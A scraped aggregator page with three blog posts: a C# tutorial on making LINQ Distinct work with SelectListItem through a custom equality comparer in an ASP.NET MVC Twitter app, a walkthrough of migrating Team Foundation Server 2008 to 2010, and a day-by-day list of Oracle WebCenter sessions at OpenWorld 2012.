MvcOAuthAuthorization auth; private TwitterContext twitterCtx; /// /// Display a list of friends current tweets /// /// public ActionResult Index() { auth = new MvcOAuthAuthorization(InMemoryTokenManager.Instance, InMemoryTokenManager.AccessToken); string accessToken = auth.CompleteAuthorize(); if (accessToken != null) { InMemoryTokenManager.AccessToken = accessToken; } if (auth.CachedCredentialsAvailable) { auth.SignOn(); } else { return auth.BeginAuthorize(); } twitterCtx = new TwitterContext(auth); var friendTweets = (from tweet in twitterCtx.Status where tweet.Type == StatusType.Friends select new TweetViewModel { ImageUrl = tweet.User.ProfileImageUrl, ScreenName = tweet.User.Identifier.ScreenName, Tweet = tweet.Text }) .ToList(); var friendNames = (from tweet in friendTweets select new SelectListItem { Text = tweet.ScreenName, Value = tweet.ScreenName }) .Distinct() .ToList(); var twendsVM = new TwitterFriendsViewModel { Tweets = friendTweets, FriendNames = friendNames }; return View(twendsVM); } public ActionResult About() { return View(); } } } The important part of the listing above are the LINQ to Twitter queries for friendTweets and friendNames. Both of these results are used in the subsequent population of the twendsVM instance that is passed to the view. Let’s dissect these two statements for clarification and focus on what is happening with Distinct. The query for friendTweets gets a list of the 20 most recent tweets (as specified by the Twitter API for friend queries) and performs a projection into the custom TweetViewModel class, repeated below for your convenience: var friendTweets = (from tweet in twitterCtx.Status where tweet.Type == StatusType.Friends select new TweetViewModel { ImageUrl = tweet.User.ProfileImageUrl, ScreenName = tweet.User.Identifier.ScreenName, Tweet = tweet.Text }) .ToList(); The LINQ to Twitter query above simplifies what we need to work with in the View and the reduces the amount of information we have to look at in subsequent queries. Given the friendTweets above, the next query performs another projection into an MVC SelectListItem, which is required for binding to the DropDownList.  This brings us to the focus of this blog post, writing a correct query that uses the Distinct operator. The query below uses LINQ to Objects, querying the friendTweets collection to get friendNames: var friendNames = (from tweet in friendTweets select new SelectListItem { Text = tweet.ScreenName, Value = tweet.ScreenName }) .Distinct() .ToList(); The above implementation of Distinct seems normal, but it is deceptively incorrect. After running the query above, by executing the application, you’ll notice that the drop-down list contains many duplicates.  This will send you back to the code scratching your head, but there’s a reason why this happens. To understand the problem, we must examine how Distinct works in LINQ to Objects. Distinct has two overloads: one without parameters, as shown above, and another that takes a parameter of type IEqualityComparer<T>.  In the case above, no parameters, Distinct will call EqualityComparer<T>.Default behind the scenes to make comparisons as it iterates through the list. You don’t have problems with the built-in types, such as string, int, DateTime, etc, because they all implement IEquatable<T>. However, many .NET Framework classes, such as SelectListItem, don’t implement IEquatable<T>. So, what happens is that EqualityComparer<T>.Default results in a call to Object.Equals, which performs reference equality on reference type objects.  You don’t have this problem with value types because the default implementation of Object.Equals is bitwise equality. However, most of your projections that use Distinct are on classes, just like the SelectListItem used in this demo application. So, the reason why Distinct didn’t produce the results we wanted was because we used a type that doesn’t define its own equality and Distinct used the default reference equality. This resulted in all objects being included in the results because they are all separate instances in memory with unique references. As you might have guessed, the solution to the problem is to use the second overload of Distinct that accepts an IEqualityComparer<T> instance. If you were projecting into your own custom type, you could make that type implement IEqualityComparer<T>, but SelectListItem belongs to the .NET Framework Class Library.  Therefore, the solution is to create a custom type to implement IEqualityComparer<T>, as in the SelectListItemComparer class, shown below: using System.Collections.Generic; using System.Web.Mvc; namespace DistinctSelectList.Models { public class SelectListItemComparer : EqualityComparer { public override bool Equals(SelectListItem x, SelectListItem y) { return x.Value.Equals(y.Value); } public override int GetHashCode(SelectListItem obj) { return obj.Value.GetHashCode(); } } } The SelectListItemComparer class above doesn’t implement IEqualityComparer<SelectListItem>, but rather derives from EqualityComparer<SelectListItem>. Microsoft recommends this approach for consistency with the behavior of generic collection classes. However, if your custom type already derives from a base class, go ahead and implement IEqualityComparer<T>, which will still work. EqualityComparer is an abstract class, that implements IEqualityComparer<T> with Equals and GetHashCode abstract methods. For the purposes of this application, the SelectListItem.Value property is sufficient to determine if two items are equal.   Since SelectListItem.Value is type string, the code delegates equality to the string class. The code also delegates the GetHashCode operation to the string class.You might have other criteria in your own object and would need to define what it means for your object to be equal. Now that we have an IEqualityComparer<SelectListItem>, let’s fix the problem. The code below modifies the query where we want distinct values: var friendNames = (from tweet in friendTweets select new SelectListItem { Text = tweet.ScreenName, Value = tweet.ScreenName }) .Distinct(new SelectListItemComparer()) .ToList(); Notice how the code above passes a new instance of SelectListItemComparer as the parameter to the Distinct operator. Now, when you run the application, the drop-down list will behave as you expect, showing only a unique set of names. In addition to Distinct, other LINQ Standard Query Operators have overloads that accept IEqualityComparer<T>’s, You can use the same techniques as shown here, with SelectListItemComparer, with those other operators as well. Now you know how to resolve problems with getting Distinct to work properly and also have a way to fix problems with other operators that require equality comparisons. @JoeMayo

    Read the article

  • Upgrading Team Foundation Server 2008 to 2010

    - by Martin Hinshelwood
    I am sure you will have seen my posts on upgrading our internal Team Foundation Server from TFS2008 to TFS2010 Beta 2, RC and RTM, but what about a fresh upgrade of TFS2008 to TFS2010 using the RTM version of TFS. One of our clients is taking the plunge with TFS2010, so I have the job of doing the upgrade. It is sometimes very useful to have a team member that starts work when most of the Sydney workers are heading home as I can do the upgrade without impacting them. The down side is that if you have any blockers then you can be pretty sure that everyone that can deal with your problem is asleep I am starting with an existing blank installation of TFS 2010, but Adam Cogan let slip that he was the one that did the install so I thought it prudent to make sure that it was OK. Verifying Team Foundation Server 2010 We need to check that TFS 2010 has been installed correctly. First, check the Admin console and have a root about for any errors. Figure: Even the SQL Setup looks good. I don’t know how Adam did it! Backing up the Team Foundation Server 2008 Databases As we are moving from one server to another (recommended method) we will be taking a backup of our TFS2008 databases and resorting them to the SQL Server for the new TFS2010 Server. Do not just detach and reattach. This will cause problems with the version of the database. If you are running a test migration you just need to create a backup of the TFS 2008 databases, but if you are doing the live migration then you should stop IIS on the TFS 2008 server before you backup the databases. This will stop any inadvertent check-ins or changes to TFS 2008. Figure: Stop IIS before you take a backup to prevent any TFS 2008 changes being written to the database. It is good to leave a little time between taking the TFS 2008 server offline and commencing the upgrade as there is always one developer who has not finished and starts screaming. This time it was John Liu that needed 10 more minutes to make his changes and check-in, so I always give it 30 minutes and see if anyone screams. John Liu [SSW] said:   are you doing something to TFS :-O MrHinsh [SSW UK][VS ALM MVP] said:   I have stopped TFS 2008 as per my emails John Liu [SSW] said:   haven't finish check in @_@   can we have it for 10mins? :) MrHinsh [SSW UK][VS ALM MVP] said:   TFS 2008 has been started John Liu [SSW] said:   I love you! -IM conversation at TFS Upgrade +25 minutes After John confirmed that he had everything done I turned IIS off again and made a cup of tea. There were no more screams so the upgrade can continue. Figure: Backup all of the databases for TFS and include the Reporting Services, just in case.   Figure: Check that all the backups have been taken Once you have your backups, you need to copy them to your new TFS2010 server and restore them. This is a good way to proceed as if we have any problems, or just plain run out of time, then you just turn the TFS 2008 server back on and all you have lost is one upgrade day, and not 10 developer days. As per the rules, you should record the number of files and the total number of areas and iterations before the upgrade so you have something to compare to: TFS2008 File count: Type Count 1 1845 2 15770 Areas & Iterations: 139 You can use this to verify that the upgrade was successful. it should however be noted that the numbers in TFS 2010 will be bigger. This is due to some of the sorting out that TFS does during the upgrade process. Restore Team Foundation Server 2008 Databases Restoring the databases is much more time consuming than just attaching them as you need to do them one at a time. But you may be taking a backup of an operational database and need to restore all your databases to a particular point in time instead of to the latest. I am doing latest unless I encounter any problems. Figure: Restore each of the databases to either a latest or specific point in time.     Figure: Restore all of the required databases Now that all of your databases are restored you now need to upgrade them to Team Foundation Server 2010. Upgrade Team Foundation Server 2008 Databases This is probably the easiest part of the process. You need to call a fire and forget command that will go off to the database specified, find the TFS 2008 databases and upgrade them to 2010. During this process all of the 6 main TFS 2008 databases are merged into the TfsVersionControl database, upgraded and then the database is renamed to TFS_[CollectionName]. The rename is only the database and not the physical files, so it is worth going back and renaming the physical file as well. This keeps everything neat and tidy. If you plan to keep the old TFS 2008 server around, for example if you are doing a test migration first, then you will need to change the TFS GUID. This GUID is unique to each TFS instance and is preserved when you upgrade. This GUID is used by the clients and they can get a little confused if there are two servers with the same one. To kick of the upgrade you need to open a command prompt and change the path to “C:\Program Files\Microsoft Team Foundation Server 2010\Tools” and run the “import” command in  “tfsconfig”. TfsConfig import /sqlinstance:<Previous TFS Data Tier>                  /collectionName:<Collection Name>                  /confirmed Imports a TFS 2005 or 2008 data tier as a new project collection. Important: This command should only be executed after adequate backups have been performed. After you import, you will need to configure portal and reporting settings via the administration console. EXAMPLES -------- TfsConfig import /sqlinstance:tfs2008sql /collectionName:imported /confirmed TfsConfig import /sqlinstance:tfs2008sql\Instance /collectionName:imported /confirmed OPTIONS: -------- sqlinstance         The sql instance of the TFS 2005 or 2008 data tier. The TFS databases at that location will be modified directly and will no longer be usable as previous version databases.  Ensure you have back-ups. collectionName      The name of the new Team Project Collection. confirmed           Confirm that you have backed-up databases before importing. This command will automatically look for the TfsIntegration database and verify that all the other required databases exist. In this case it took around 5 minutes to complete the upgrade as the total database size was under 700MB. This was unlike the upgrade of SSW’s production database with over 17GB of data which took a few hours. At the end of the process you should get no errors and no warnings. The Upgrade operation on the ApplicationTier feature has completed. There were 0 errors and 0 warnings. As this is a new server and not a pure upgrade there should not be a problem with the GUID. If you think at any point you will be doing this more than once, for example doing a test migration, or merging many TFS 2008 instances into a single one, then you should go back and rename the physical TfsVersionControl.mdf file to the same as the new collection. This will avoid confusion later down the line. To do this, detach the new collection from the server and rename the physical files. Then reattach and change the physical file locations to match the new name. You can follow http://www.mssqltips.com/tip.asp?tip=1122 for a more detailed explanation of how to do this. Figure: Stop the collection so TFS does not take a wobbly when we detach the database. When you try to start the new collection again you will get a conflict with project names and will require to remove the Test Upgrade collection. This is fine and it just needs detached. Figure: Detaching the test upgrade from the new Team Foundation Server 2010 so we can start the new Collection again. You will now be able to start the new upgraded collection and you are ready for testing. Do you remember the stats we took off the TFS 2008 server? TFS2008 File count: Type Count 1 1845 2 15770 Areas & Iterations: 139 Well, now we need to compare them to the TFS 2010 stats, remembering that there will probably be more files under source control. TFS2010 File count: Type Count 1 19288 Areas & Iterations: 139 Lovely, the number of iterations are the same, and the number of files is bigger. Just what we were looking for. Testing the upgraded Team Foundation Server 2010 Project Collection Can we connect to the new collection and project? Figure: We can connect to the new collection and project.   Figure: make sure you can connect to The upgraded projects and that you can see all of the files. Figure: Team Web Access is there and working. Note that for Team Web Access you now use the same port and URL as for TFS 2010. So in this case as I am running on the local box you need to use http://localhost:8080/tfs which will redirect you to http://localhost:8080/tfs/web for the web access. If you need to connect with a Visual Studio 2008 client you will need to use the full path of the new collection, http://[servername]/tfs/[collectionname] and this will work with all of your collections. With Visual Studio 2005 you will only be able to connect to the Default collection and in both VS2008 and VS2005 you will need to install the forward compatibility updates. Visual Studio Team System 2005 Service Pack 1 Forward Compatibility Update for Team Foundation Server 2010 Visual Studio Team System 2008 Service Pack 1 Forward Compatibility Update for Team Foundation Server 2010 To make sure that you have everything up to date, make sure that you run SSW Diagnostics and get all green ticks. Upgrade Done! At this point you can send out a notice to everyone that the upgrade is complete and and give them the connection details. You need to remember that at this stage we have 2008 project upgraded to run under TFS 2010 but it is still running under that same process template that it was running before. You can only “enable” 2010 features in a process template you can’t upgrade. So what to do? Well, you need to create a new project and migrate things you want to keep across. Souse code is easy, you can move or Branch, but Work Items are more difficult as you can’t move them between projects. This instance is complicated more as the old project uses the Conchango/EMC Scrum for Team System template and I will need to write a script/application to get the work items across with their attachments in tact. That is my next task! Technorati Tags: TFS 2010,TFS 2008,VS ALM

    Read the article

  • 26 Days: Countdown to Oracle OpenWorld 2012

    - by Michael Snow
    Welcome to our countdown to Oracle OpenWorld! Oracle OpenWorld 2012 is just around the corner. In less than 26 days, San Francisco will be invaded by an expected 50,000 people from all over the world. Here on the Oracle WebCenter team, we’ve all been working to help make the experience a great one for all our WebCenter customers. For a sneak peak  – we’ll be spending this week giving you a teaser of what to look forward to if you are joining us in San Francisco from September 30th through October 4th. We have Oracle WebCenter sessions covering all topics imaginable. Take a look and use the tools we provide to build out your schedule in advance and reserve your seats in your favorite sessions.  That gives you plenty of time to plan for your week with us in San Francisco. If unfortunately, your boss denied your request to attend - there are still some ways that you can join in the experience virtually On-Demand. This year - we are expanding even more up North of Market Street and will be taking over Union Square as well. Check out this map of San Francisco to get a sense of how much of a footprint Oracle OpenWorld has grown to this year. With so much to see and so many sessions to learn from - its no wonder that people get excited. Add to that a good mix of fun and all of the possible WebCenter sessions you could attend - you won't want to sleep at all to take full advantage of such an opportunity. We'll also have our annual WebCenter Customer Appreciation reception - stay tuned this week for some more info on registration to make sure you'll be able to join us. If you've been following the America's Cup at all and believe in EXTREME PERFORMANCE you'll definitely want to take a look at this video from last year's OpenWorld Keynote. 12.00 Normal 0 false false false EN-US X-NONE X-NONE MicrosoftInternetExplorer4 /* Style Definitions */ table.MsoNormalTable {mso-style-name:"Table Normal"; mso-tstyle-rowband-size:0; mso-tstyle-colband-size:0; mso-style-noshow:yes; mso-style-priority:99; mso-style-qformat:yes; mso-style-parent:""; mso-padding-alt:0in 5.4pt 0in 5.4pt; mso-para-margin:0in; mso-para-margin-bottom:.0001pt; mso-pagination:widow-orphan; font-family:"Calibri","sans-serif"; mso-ascii- mso-ascii-theme-font:minor-latin; mso-fareast-font-family:"Times New Roman"; mso-fareast-theme-font:minor-fareast; mso-hansi- mso-hansi-theme-font:minor-latin; mso-bidi-font-family:"Times New Roman"; mso-bidi-theme-font:minor-bidi;} Important OpenWorld Links:  Attendee / Presenters Toolkit Oracle Schedule Builder WebCenter Sessions (listed in the catalog under Fusion Middleware as "Portals, Sites, Content, and Collaboration" ) Oracle Music Festival - AMAZING Line up!!  Oracle Customer Appreciation Night -LOOK HERE!! Oracle OpenWorld LIVE On-Demand Here are all the WebCenter sessions broken down by day for your viewing pleasure. Monday, October 1st CON8885 - Simplify CRM Engagement with Contextual Collaboration Are your sales teams disconnected and disengaged? Do you want a tool for easily connecting expertise across your organization and providing visibility into the complete sales process? Do you want a way to enhance and retain organization knowledge? Oracle Social Network is the answer. Attend this session to learn how to make CRM easy, effective, and efficient for use across virtual sales teams. Also learn how Oracle Social Network can drive sales force collaboration with natural conversations throughout the sales cycle, promote sales team productivity through purposeful social networking without the noise, and build cross-team knowledge by integrating conversations with CRM and other business applications. CON8268 - Oracle WebCenter Strategy: Engaging Your Customers. Empowering Your Business Oracle WebCenter is a user engagement platform for social business, connecting people and information. Attend this session to learn about the Oracle WebCenter strategy, and understand where Oracle is taking the platform to help companies engage customers, empower employees, and enable partners. Business success starts with ensuring that everyone is engaged with the right people and the right information and can access what they need through the channel of their choice—Web, mobile, or social. Are you giving customers, employees, and partners the best-possible experience? Come learn how you can! ¶ HOL10208 - Add Social Capabilities to Your Enterprise Applications Oracle Social Network enables you to add real-time collaboration capabilities into your enterprise applications, so that conversations can happen directly within your business systems. In this hands-on lab, you will try out the Oracle Social Network product to collaborate with other attendees, using real-time conversations with document sharing capabilities. Next you will embed social capabilities into a sample Web-based enterprise application, using embedded UI components. Experts will also write simple REST-based integrations, using the Oracle Social Network API to programmatically create social interactions. ¶ CON8893 - Improve Employee Productivity with Intuitive and Social Work Environments Social technologies have already transformed the ways customers, employees, partners, and suppliers communicate and stay informed. Forward-thinking organizations today need technologies and infrastructures to help them advance to the next level and integrate social activities with business applications to deliver a user experience that simplifies business processes and enterprise application engagement. Attend this session to hear from an innovative Oracle Social Network customer and learn how you can improve productivity with intuitive and social work environments and empower your employees with innovative social tools to enable contextual access to content and dynamic personalization of solutions. ¶ CON8270 - Oracle WebCenter Content Strategy and Vision Oracle WebCenter provides a strategic content infrastructure for managing documents, images, e-mails, and rich media files. With a single repository, organizations can address any content use case, such as accounts payable, HR onboarding, document management, compliance, records management, digital asset management, or Website management. In this session, learn about future plans for how Oracle WebCenter will address new use cases as well as new integrations with Oracle Fusion Middleware and Oracle Applications, leveraging your investments by making your users more productive and error-free. ¶ CON8269 - Oracle WebCenter Sites Strategy and Vision Oracle’s Web experience management solution, Oracle WebCenter Sites, enables organizations to use the online channel to drive customer acquisition and brand loyalty. It helps marketers and business users easily create and manage contextually relevant, social, interactive online experiences across multiple channels on a global scale. In this session, learn about future plans for how Oracle WebCenter Sites will provide you with the tools, capabilities, and integrations you need in order to continue to address your customers’ evolving requirements for engaging online experiences and keep moving your business forward. ¶ CON8896 - Living with SharePoint SharePoint is a popular platform, but it’s not always the best fit for Oracle customers. In this session, you’ll discover the technical and nontechnical limitations and pitfalls of SharePoint and learn about Oracle alternatives for collaboration, portals, enterprise and Web content management, social computing, and application integration. The presentation shows you how to integrate with SharePoint when business or IT requirements dictate and covers cloud-based (Office 365) and on-premises versions of SharePoint. Presented by a former Microsoft director of SharePoint product management and backed by independent customer research, this session will prepare you to answer the question “Why don’t we just use SharePoint for that?’ the next time it comes up in your organization. ¶ CON7843 - Content-Enabling Enterprise Processes with Oracle WebCenter Organizations today continually strive to automate business processes, reduce costs, and improve efficiency. Many business processes are content-intensive and unstructured, requiring ad hoc collaboration, and distributed in nature, requiring many approvals and generating huge volumes of paper. In this session, learn how Oracle and SYSTIME have partnered to help a customer content-enable its enterprise with Oracle WebCenter Content and Oracle WebCenter Imaging 11g and integrate them with Oracle Applications. ¶ CON6114 - Tape Robotics’ Newest Superhero: Now Fueled by Oracle Software For small, midsize, and rapidly growing businesses that want the most energy-efficient, scalable storage infrastructure to meet their rapidly growing data demands, Oracle’s most recent addition to its award-winning tape portfolio leverages several pieces of Oracle software. With Oracle Linux, Oracle WebLogic, and Oracle Fusion Middleware tools, the library achieves a higher level of usability than previous products while offering customers a familiar interface for management, plus ease of use. This session examines the competitive advantages of the tape library and how Oracle software raises customer satisfaction. Learn how the combination of Oracle engineered systems, Oracle Secure Backup, and Oracle’s StorageTek tape libraries provide end-to-end coverage of your data. ¶ CON9437 - Mobile Access Management With more than five billion mobile devices on the planet and an increasing number of users using their own devices to access corporate data and applications, securely extending identity management to mobile devices has become a hot topic. This session focuses on how to extend your existing identity management infrastructure and policies to securely and seamlessly enable mobile user access. CON7815 - Customer Experience Online in Cloud: Oracle WebCenter Sites, Oracle ATG Apps, Oracle Exalogic Oracle WebCenter Sites and Oracle’s ATG product line together can provide a compelling marketing and e-commerce experience. When you couple them with the extreme performance of Oracle Exalogic, you’ll see unmatched scalability that provides you with a true cloud-based solution. In this session, you’ll learn how running Oracle WebCenter Sites and ATG applications on Oracle Exalogic delivers both a private and a public cloud experience. Find out what it takes to get these systems working together and delivering engaging Web experiences. Even if you aren’t considering Oracle Exalogic today, the rich Web experience of Oracle WebCenter, paired with the depth of the ATG product line, can provide your business full support, from merchandising through sale completion. ¶ CON8271 - Oracle WebCenter Portal Strategy and Vision To innovate and keep a competitive edge, organizations need to leverage the power of agile and responsive Web applications. Oracle WebCenter Portal enables you to do just that, by delivering intuitive user experiences for enterprise applications to drive innovation with composite applications and mashups. Attend this session to learn firsthand from customers how Oracle WebCenter Portal extends the value of existing enterprise applications, business processes, and content; delivers a superior business user experience; and maximizes limited IT resources. ¶ CON8880 - The Connected Customer Experience Begins with the Online Channel There’s a lot of talk these days about how to connect the customer journey across various touchpoints—from Websites and e-commerce to call centers and in-store—to provide experiences that are more relevant and engaging and ultimately gain competitive edge. Doing it all at once isn’t a realistic objective, so where do you start? Come to this session, and hear about three steps you can take that can help you begin your journey toward delivering the connected customer experience. You’ll hear how Oracle now has an integrated digital marketing platform for your corporate Website, your e-commerce site, your self-service portal, and your marketing and loyalty campaigns, and you’ll learn what you can do today to begin executing on your customer experience initiatives. ¶ GEN11451 - General Session: Building Mobile Applications with Oracle Cloud With the prevalence of smart mobile devices, companies are facing an increased demand to provide access to data and applications from new channels. However, developing applications for mobile devices poses some unique challenges. Come to this session to learn how Oracle addresses these challenges, offering a simpler way to develop and deploy cross-device mobile applications. See how Oracle Cloud enables you to access applications, data, and services from mobile channels in an easier way.  CON8272 - Oracle Social Network Strategy and Vision One key way of increasing employee productivity is by bringing people, processes, and information together—providing new social capabilities to enable business users to quickly correspond and collaborate on business activities. Oracle WebCenter provides a user engagement platform with social and collaborative technologies to empower business users to focus on their key business processes, applications, and content in the context of their role and process. Attend this session to hear how the latest social capabilities in Oracle Social Network are enabling organizations to transform themselves into social businesses.  --- Tuesday, October 2nd HOL10194 - Enterprise Content Management Simplified: Oracle WebCenter Content’s Next-Generation UI Regardless of the nature of your business, unstructured content underpins many of its daily functions. Whether you are working with traditional presentations, spreadsheets, or text documents—or even with digital assets such as images and multimedia files—your content needs to be accessible and manageable in convenient and intuitive ways to make working with the content easier. Additionally, you need the ability to easily share documents with coworkers to facilitate a collaborative working environment. Come to this session to see how Oracle WebCenter Content’s next-generation user interface helps modern knowledge workers easily manage personal and enterprise documents in a collaborative environment.¶ CON8877 - Develop a Mobile Strategy with Oracle WebCenter: Engage Customers, Employees, and Partners Mobile technology has gone from nice-to-have to a cornerstone of user engagement. Mobile access enables users to have information available at their fingertips, enabling them to take action the moment they make a decision, interact in the moment of convenience, and take advantage of new service offerings in their preferred channels. All your employees have your mobile applications in their pocket; now what are you going to do? It is a critical step for companies to think through what their employees, customers, and partners really need on their devices. Attend this session to see how Oracle WebCenter enables you to better engage your customers, employees, and partners by providing a unified experience across multiple channels. ¶ CON9447 - Enabling Access for Hundreds of Millions of Users How do you grow your business by identifying, authenticating, authorizing, and federating users on the Web, leveraging social identity and the open source OAuth protocol? How do you scale your access management solution to support hundreds of millions of users? With social identity support out of the box, Oracle’s access management solution is also benchmarked for 250-million-user deployment according to real-world customer scenarios. In this session, you will learn about the social identity capability and the 250-million-user benchmark testing of Oracle Access Manager and Oracle Adaptive Access Manager running on Oracle Exalogic and Oracle Exadata. ¶ HOL10207 - Build an Intranet Portal with Oracle WebCenter In this hands-on lab, you’ll work with Oracle WebCenter Portal and Oracle WebCenter Content to build out an enterprise portal that maximizes the productivity of teams and individual contributors. Using browser-based tools, you’ll manage site resources such as page styles, templates, and navigation. You’ll edit content stored in Oracle WebCenter Content directly from your portal. You’ll also experience the latest features that promote collaboration, social networking, and personal productivity. ¶ CON2906 - Get Proactive: Best Practices for Maintaining Oracle Fusion Middleware You chose Oracle Fusion Middleware products to help your organization deliver superior business results. Now learn how to take full advantage of your software with all the great tools, resources, and product updates you’re entitled to through Oracle Support. In this session, Oracle product experts provide proven best practices to help you work more efficiently, plan and prepare for upgrades and patching more effectively, and manage risk. Topics include configuration management tools, remote diagnostics, My Oracle Support Community, and My Oracle Support Lifecycle Advisors. New users and Oracle Fusion Middleware experts alike are guaranteed to leave with fresh ideas and practical, easy-to-implement next steps. ¶ CON8878 - Oracle WebCenter’s Cloud Strategy: From Social and Platform Services to Mashups Cloud computing represents a paradigm shift in how we build applications, automate processes, collaborate, and share and in how we secure our enterprise. Additionally, as you adopt cloud-based services in your organization, it’s likely that you will still have many critical on-premises applications running. With these mixed environments, multiple user interfaces, different security, and multiple datasources and content sources, how do you start evolving your strategy to account for these challenges? Oracle WebCenter offers a complete array of technologies enabling you to solve these challenges and prepare you for the cloud. Attend this session to learn how you can use Oracle WebCenter in the cloud as well as create on-premises and cloud application mash-ups. ¶ CON8901 - Optimize Enterprise Business Processes with Oracle WebCenter and Oracle BPM Do you have business processes that span multiple applications? Are you grappling with how to have visibility across these business processes; how to manage content that is associated with these processes; and, most importantly, how to model and optimize these business processes? Attend this session to hear how Oracle WebCenter and Oracle Business Process Management provide a unique set of integrated solutions to provide a composite application dashboard across these business processes and offer a solution for content-centric business processes. ¶ CON8883 - Deliver Engaging Interfaces to Oracle Applications with Oracle WebCenter Critical business processes live within enterprise applications, and application users need to manage and execute these processes as effectively as possible. Oracle provides a comprehensive user engagement platform to increase user productivity and optimize overall processes within Oracle Applications—Oracle E-Business Suite and Oracle’s Siebel, PeopleSoft, and JD Edwards product families—and third-party applications. Attend this session to learn how you can integrate these applications with Oracle WebCenter to deliver composite application dashboards to your end users—whether they are your customers, partners, or employees—for enhanced usability and Web 2.0–enabled enterprise portals.¶ Wednesday, October 3rd CON8895 - Future-Ready Intranets: How Aramark Re-engineered the Application Landscape There are essential techniques and technologies you can use to deliver employee portals that garner higher productivity, improve business efficiency, and increase user engagement. Attend this session to learn how you can leverage Oracle WebCenter Portal as a user engagement platform for bringing together business process management, enterprise content management, and business intelligence into a highly relevant and integrated experience. Hear how Aramark has leveraged Oracle WebCenter Portal and Oracle WebCenter Content to deliver a unified workspace providing simpler navigation and processing, consolidation of tools, easy access to information, integrated search, and single sign-on. ¶ CON8886 - Content Consolidation: Save Money, Increase Efficiency, and Eliminate Silos Organizations are looking for ways to save money and be more efficient. With content in many different places, it’s difficult to know where to look for a document and whether the document is the most current version. With Oracle WebCenter, content can be consolidated into one best-of-breed repository that is secure, scalable, and integrated with your business processes and applications. Users can find the content they need, where they need it, and ensure that it is the right content. This session covers content challenges that affect your business; content consolidation that can lead to savings in storage and administration costs and can lower risks; and how companies are realizing savings. ¶ CON8911 - Improve Online Experiences for Customers and Partners with Self-Service Portals Are you able to provide your customers and partners an easy-to-use online self-service experience? Are you processing high-volume transactions and struggling with call center bottlenecks or back-end systems that won’t integrate, causing order delays and customer frustration? Are you looking to target content such as product and service offerings to your end users? This session shares approaches to providing targeted delivery as well as strategies and best practices for transforming your business by providing an intuitive user experience for your customers and partners. ¶ CON6156 - Top 10 Ways to Integrate Oracle WebCenter Content This session covers 10 common ways to integrate Oracle WebCenter Content with other enterprise applications and middleware. It discusses out-of-the-box modules that provide expanded features in Oracle WebCenter Content—such as enterprise search, SOA, and BPEL—as well as developer tools you can use to create custom integrations. The presentation also gives guidance on which integration option may work best in your environment. ¶ HOL10207 - Build an Intranet Portal with Oracle WebCenter In this hands-on lab, you’ll work with Oracle WebCenter Portal and Oracle WebCenter Content to build out an enterprise portal that maximizes the productivity of teams and individual contributors. Using browser-based tools, you’ll manage site resources such as page styles, templates, and navigation. You’ll edit content stored in Oracle WebCenter Content directly from your portal. You’ll also experience the latest features that promote collaboration, social networking, and personal productivity. ¶ CON7817 - Migration to Oracle WebCenter Imaging 11g Customers today continually strive to automate business processes, reduce costs, and improve efficiency. The accounts payable process—which is often distributed in nature, requires many approvals, and generates huge volumes of paper invoices—is automated by many customers. In this session, learn how Oracle and SYSTIME have partnered to help a customer migrate its existing Oracle Imaging and Process Management Release 7.6 to the latest Oracle WebCenter Imaging 11g and integrate it with Oracle’s JD Edwards family of products. ¶ CON8910 - How to Engage Customers Across Web, Mobile, and Social Channels Whether on desktops at the office, on tablets at home, or on mobile phones when on the go, today’s customers are always connected. To engage today’s customers, you need to make the online customer experience connected and consistent across a host of devices and multiple channels, including Web, mobile, and social networks. Managing this multichannel environment can result in lots of headaches without the right tools. Attend this session to learn how Oracle WebCenter Sites solves the challenge of multichannel customer engagement. ¶ HOL10206 - Oracle WebCenter Sites 11g: Transforming the Content Contributor Experience Oracle WebCenter Sites 11g makes it easy for marketers and business users to contribute to and manage Websites with the new visual, contextual, and intuitive Web authoring interface. In this hands-on lab, you will create and manage content for a sports-themed Website, using many of the new and enhanced features of the 11g release. ¶ CON8900 - Building Next-Generation Portals: An Interactive Customer Panel Discussion Social and collaborative technologies have changed how people interact, learn, and collaborate, and providing a modern, social Web presence is imperative to remain competitive in today’s market. Can your business benefit from a more collaborative and interactive portal environment for employees, customers, and partners? Attend this session to hear from Oracle WebCenter Portal customers as they share their strategies and best practices for providing users with a modern experience that adapts to their needs and includes personalized access to content in context. The panel also addresses how customers have benefited from creating next-generation portals by migrating from older portal technologies to Oracle WebCenter Portal. ¶ CON9625 - Taking Control of Oracle WebCenter Security Organizations are increasingly looking to extend their Oracle WebCenter portal for social business, to serve external users and provide seamless access to the right information. In particular, many organizations are extending Oracle WebCenter in a business-to-business scenario requiring secure identification and authorization of business partners and their users. This session focuses on how customers are leveraging, securing, and providing access control to Oracle WebCenter portal and mobile solutions. You will learn best practices and hear real-world examples of how to provide flexible and granular access control for Oracle WebCenter deployments, using Oracle Platform Security Services and Oracle Access Management Suite product offerings. ¶ CON8891 - Extending Social into Enterprise Applications and Business Processes Oracle Social Network is an extensible social platform that enables contextual collaboration within enterprise applications and business processes, providing relevant data from across various enterprise systems in one place. Attend this session to see how an Oracle Social Network customer is integrating multiple applications—such as CRM, HCM, and business processes—into Oracle Social Network and Oracle WebCenter to enable individuals and teams to solve complex cross-organizational business problems more effectively by utilizing the social enterprise. ¶ Thursday, October 4th CON8899 - Becoming a Social Business: Stories from the Front Lines of Change What does it really mean to be a social business? How can you change our organization to embrace social approaches? What pitfalls do you need to avoid? In this lively panel discussion, customer and industry thought leaders in social business explore these topics and more as they share their stories of the good, the bad, and the ugly that can happen when embracing social methods and technologies to improve business success. Using moderated questions and open Q&A from the audience, the panel discusses vital topics such as the critical factors for success, the major issues to avoid, how to gain senior executive support for social efforts, how to handle undesired behavior, and how to measure business impact. It takes a thought-provoking look at becoming a social business from the inside. ¶ CON6851 - Oracle WebCenter and Oracle Business Intelligence Enterprise Edition to Create Vendor Portals Large manufacturers of grocery items routinely find themselves depending on the inventory management expertise of their wholesalers and distributors. Inventory costs can be managed more efficiently by the manufacturers if they have better insight into the inventory levels of items carried by their distributors. This creates a unique opportunity for distributors and wholesalers to leverage this knowledge into a revenue-generating subscription service. Oracle Business Intelligence Enterprise Edition and Oracle WebCenter Portal play a key part in enabling creation of business-managed business intelligence portals for vendors. This session discusses one customer that implemented this by leveraging Oracle WebCenter and Oracle Business Intelligence Enterprise Edition. ¶ CON8879 - Provide a Personalized and Consistent Customer Experience in Your Websites and Portals Your customers engage with your company online in different ways throughout their journey—from prospecting by acquiring information on your corporate Website to transacting through self-service applications on your customer portal—and then the cycle begins again when they look for new products and services. Ensuring that the customer experience is consistent and personalized across online properties—from branding and content to interactions and transactions—can be a daunting task. Oracle WebCenter enables you to speak and interact with your customers with one voice across your Websites and portals by providing an integrated platform for delivery of self-service and engagement that unifies and personalizes the online experience. 